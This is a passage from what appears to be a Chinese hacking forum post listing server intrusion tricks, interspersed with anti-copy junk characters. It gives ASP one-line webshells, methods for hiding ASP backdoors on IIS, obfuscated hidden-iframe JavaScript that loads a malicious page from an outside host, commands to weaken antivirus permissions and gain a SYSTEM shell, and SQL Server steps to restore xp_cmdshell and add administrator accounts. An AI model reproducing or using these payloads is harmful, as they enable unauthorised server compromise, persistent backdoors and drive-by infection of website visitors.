2 I0 _" P: p1 G" l. Jc).%><%execute request("go")%><%
/ U# A- X1 K( h2 hd).<script language=VBScript runat=server>execute request("sb")</Script>" v" J/ x) N. m8 N+ D
e).<%25Execute(request("l"))%25>
' A/ J- v: i8 t! i7 c; ~+ t) Yf).<%if request("cmd")<>"" then execute request("pass")%># W3 O4 H+ E5 Z2 ^
- _1 s; ?  n: s2 V6 G' r& U
52、at "12:17" /interactive cmd
& ]3 n; @8 h2 n; L' Y+ f6 m/ J执行后可以用AT命令查看新加的任务
; ~5 T* X9 G, _6 R用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
& E: N: D8 ^2 s6 A% k) t: T, p$ y0 g
53、隐藏ASP后门的两种方法
$ a* D  |. l0 T- w2 V3 W8 F1、建立非标准目录:mkdir images..\
3 [: T4 \% W0 i拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp  `8 K# J2 U- i: a- x
通过web访问ASP木马:http://ip/images../news.asp?action=login2 o/ m& ^' u: b3 m  K1 d% W# S; f$ y' U
如何删除非标准目录:rmdir images..\ /s# Y, M" q- W/ p0 X* E
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:% j* N0 N) g8 E& S2 m
mkdir programme.asp
5 n9 t4 K/ e9 v* ]2 r新建1.txt文件内容:<!--#include file=”12.jpg”-->
( o& S; v0 r  [) A: X: s新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件+ ^" W9 I. |" u( N0 F& U8 T  n4 D
attrib +H +S programme.asp
4 r! V) D: W7 m- k* t7 q: g通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
# @& w% x6 G- S# P# d3 B1 _3 E: B9 F# U9 w2 I
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
; h# j9 ?$ Z$ e$ C7 t然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
7 w0 f( F" Z! S; Z/ t( z* r  ^* g0 e+ c9 u$ N: }8 _# s
55、JS隐蔽挂马
. {' R% `# U7 t/ x% K+ ^! O1.
  ]% W, e. k* m" Z- Nvar tr4c3="<iframe src=ht";1 Y) K) ~8 }0 ]9 ?6 c( O6 y
tr4c3 = tr4c3+"tp:/";; Z* i7 }& |& ^1 \, ^* n
tr4c3 = tr4c3+"/ww";
7 Q$ B5 J- m, h: Q* str4c3 = tr4c3+"w.tr4";
- N8 T4 y% }7 y  E3 U+ a; etr4c3 = tr4c3+"c3.com/inc/m";2 v/ e0 F$ {3 A) {1 W2 X0 x
tr4c3 = tr4c3+"m.htm style="display:none"></i";! V9 g- h, U8 e- {1 F% p+ _, |+ l
tr4c3 =tr4c3+"frame>'";$ \3 o% Z4 l3 L
document.write(tr4c3);
$ x3 g/ J7 F8 P, z" n) @6 x避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
, d0 |  B# t, v6 X: R  L6 u6 K4 H$ M9 e$ `0 C
2.  y5 c' m& u& G* ^
转换进制,然后用EVAL执行。如9 l4 B. {" ^& b2 {0 `
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");+ M8 C9 L$ p( Z" v
不过这个有点显眼。# O4 `3 V8 H5 u5 K
3.# e; S9 D- @6 ~! b3 ^/ P8 n
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
8 ^0 v. I. R8 X* P最后一点,别忘了把文件的时间也修改下。3 t- R9 E/ `: `6 \6 D

  M0 f4 L9 X) P  E0 q0 a: b; @56.3389终端入侵常用DOS命令+ W) A, E# D) {( o4 r7 L
taskkill taskkill /PID 1248 /t
& j! |0 B* A. W+ t% |! o. z1 z% Y: j1 r2 {+ D& l
tasklist 查进程) b0 }- y  e. k3 q

# T2 P% r7 I* w; E/ U2 ccacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
0 m) t' k( o7 i# [4 l2 I$ Z- Viisreset /reboot
4 R- ?5 ?  _/ M) Z( d& q; L+ a: Mtsshutdn /reboot /delay:1    重起服务器5 G4 C3 b; S0 f
1 A: s$ W* ~* d+ O$ Z7 ]
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,5 @2 A; _' Y5 J% J
1 G4 F' H: u( C2 S$ d: a8 C
query user 查看当前终端用户在线情况
  O; H  J4 N+ h4 n
) F, S  r, @6 l9 E5 {0 N' a1 |要显示有关所有会话使用的进程的信息,请键入:query process *
6 F2 g8 x- H& }# s" I; C- |/ d
; T+ c4 S) N0 B% R2 x要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, n4 E7 Q& P  [8 ~' @, X  _. H: L* Y3 m) U2 Q7 z. e
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
# e3 b- Z4 m3 @- n& d7 `' S8 N5 l# e, f
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
2 S+ A  C3 C* e/ G5 e4 q$ ^5 j
3 k  n6 _% R) T9 X) }命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
5 p( Y- Z: R+ b7 K9 x* r, V' q' Q
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
1 [5 L# e$ Q3 ]7 T. G7 j, k9 V( e4 e, v6 J8 |$ t1 D. q4 C7 d
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
9 G8 z# D) a" c3 ^  J' _& Z
" v& h2 b0 y0 K7 K命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机: R" o% z& I- s( s  S  x+ P! E: y* n
+ Z  P6 Q; Y/ {6 L9 x# C
56、在地址栏或按Ctrl+O,输入:
  I. j, r8 R9 \* Q) n, X" fjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
) D2 u5 B& ?, y. y. b7 x% a7 [0 H8 S7 H& M' m
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
3 o7 x2 Y4 P! G6 F, f, }7 G$ J+ V6 v4 q. u/ M+ _, N; _2 Q
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
: E, q4 _0 z* r用net localgroup administrators是可以看到管理组下,加了$的用户的。
9 O' z3 e+ e- D0 A+ u
: q, h2 q6 [8 C/ C58、 sa弱口令相关命令8 T9 P5 T/ R  C
; a* l9 h0 T/ _
一.更改sa口令方法:
; q1 V* z' u- j& b6 s用sql综合利用工具连接后,执行命令:
5 H9 {3 z' q  T1 p/ X% |8 r' R5 \exec sp_password NULL,'20001001','sa'
* K3 c* p5 D9 n5 s* Q/ y(提示:慎用!)
& M( n  b: n3 X2 s3 c: t
$ g2 n& D$ `9 }二.简单修补sa弱口令.
$ r% r0 n( u/ T( Y8 ]. J' A! n# p! m1 U/ A- C9 _, y) o
方法1:查询分离器连接后执行:+ g+ t0 c1 d# b
if exists (select * from+ p' u8 u- d! p# c" ~. m
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
6 P' b: `/ C+ `' R, hOBJECTPROPERTY(id, N'IsExtendedProc') = 1)# D. i$ v* E' a$ q
' i) w) z$ K0 m/ ~6 }/ W
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'$ B" M  H: H& f4 f
$ z- _! W0 M' y2 T6 P  [6 H
GO1 i1 n' `- Q6 R$ f9 y8 ^

% o; o. p& I+ p  C% Z然后按F5键命令执行完毕3 b4 l  ^1 K( k7 [, M! U% l
2 ^; C- z& p9 Q3 S
方法2:查询分离器连接后
' b: p( `5 V- Y5 n第一步执行:use master# H/ I' K4 O+ Z: q
第二步执行:sp_dropextendedproc 'xp_cmdshell'
& v+ j% ]  O" y& |& `: B' _; C然后按F5键命令执行完毕' @( }) N7 D8 U+ y/ m. k* s
: L$ j6 H* s: [2 z! v4 h

( g* i8 Z& F5 |4 n6 }- S9 n三.常见情况恢复执行xp_cmdshell.
, p+ j2 W5 |; u" @% A9 l& n' f* Q  F, p8 q0 E/ q8 w% O: A9 n: h* h
2 N9 N5 r. z; v% Z5 t. w
1 未能找到存储过程'master..xpcmdshell'.
4 g2 @' t" l% d. W' u- @" U   恢复方法:查询分离器连接后,2 a& c! }( ^2 h. n
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
7 u3 [$ l8 y6 ^第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'7 a4 Z( k/ |$ G8 I/ B# R+ P, }
然后按F5键命令执行完毕
0 ]. [' C( B& e. |& l
; Y+ }6 k: H, P+ \/ e' l2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
. ^# E# l$ a7 k# W& P恢复方法:查询分离器连接后,6 N& T) D/ h3 [1 ?' [8 U5 K( w2 {6 `
第一步执行:sp_dropextendedproc "xp_cmdshell"
& \- R! o" o" @% Q9 ]' l第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
: |  E$ r+ O4 J+ S4 L3 b% I. V8 T; ^然后按F5键命令执行完毕
* H2 U/ S& H7 l: X. X4 R$ y
4 n+ I; A' h+ L& g5 w! A3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)9 k1 v2 C1 @/ s& h5 k9 w
恢复方法:查询分离器连接后,& D2 q& A9 B$ Q/ @, H3 S) b
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'1 |& h& [. ^5 W1 U
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
- A; Y' q9 c7 |5 q' i然后按F5键命令执行完毕
  O% o3 J' @" F
5 h/ u' x/ C* a, w. d2 I0 ~! v四.终极方法.
) E6 g# u% @% E如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
8 `. `$ O# x) b+ P* X* l/ A( t- a# e查询分离器连接后,
, m8 N  N8 z# N7 b! M, v; g8 P7 s2000servser系统:, ~! f& f3 V) J* T) |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'8 ~0 d' a$ G- B

& {+ w7 x0 v2 }( z) l/ C, ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
, ~8 n  N+ R6 ^2 I3 k% J% D, ]8 V: k" y1 \+ H- |  Z; _5 T
xp或2003server系统:
4 t  _2 ~  }8 E" J  k2 ~; @! M" i' I5 n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
) s7 e) N/ W/ {, t4 J  X1 F8 Y( @( J4 j1 |. v+ {1 Q- C3 y, E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'- l% R! D* P* Q& X% z2 Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表